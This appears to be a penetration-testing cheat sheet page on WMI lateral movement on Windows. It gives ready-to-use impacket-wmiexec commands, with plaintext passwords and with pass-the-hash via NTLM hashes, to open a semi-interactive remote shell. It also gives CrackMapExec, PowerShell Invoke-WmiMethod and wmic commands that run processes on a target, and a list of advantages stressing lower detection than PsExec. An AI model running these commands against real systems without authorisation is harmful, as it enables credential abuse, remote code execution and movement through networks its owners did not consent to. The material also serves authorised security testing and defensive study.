Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Impacket — wmiexec

impacket-wmiexec DOMAIN/user:password@TARGET
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Semi-interactive shell. Runs as user (not SYSTEM).

Execute Single Command

impacket-wmiexec DOMAIN/user:password@TARGET "whoami"
impacket-wmiexec DOMAIN/user:password@TARGET "ipconfig /all"

CrackMapExec (WMI)

crackmapexec wmi TARGET -u user -p password -x "whoami"

PowerShell (From Windows)

$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

wmic

wmic /node:TARGET /user:DOMAIN\user /password:password process call create "cmd /c whoami > C:\temp\out.txt"

Advantages

  • No binary uploaded to target
  • Uses WMI (port 135 + dynamic)
  • Less detection than PsExec
  • No service creation

Limitations

  • Semi-interactive (not fully interactive)
  • Output via SMB share (needs ADMIN$ access)
  • Runs as calling user, not SYSTEM

Quick Reference

TaskCommand
Shellimpacket-wmiexec DOMAIN/user:pass@TARGET
PtHimpacket-wmiexec DOMAIN/user@TARGET -hashes :HASH
Single cmdimpacket-wmiexec DOMAIN/user:pass@TARGET "whoami"
wmicwmic /node:TARGET process call create "cmd"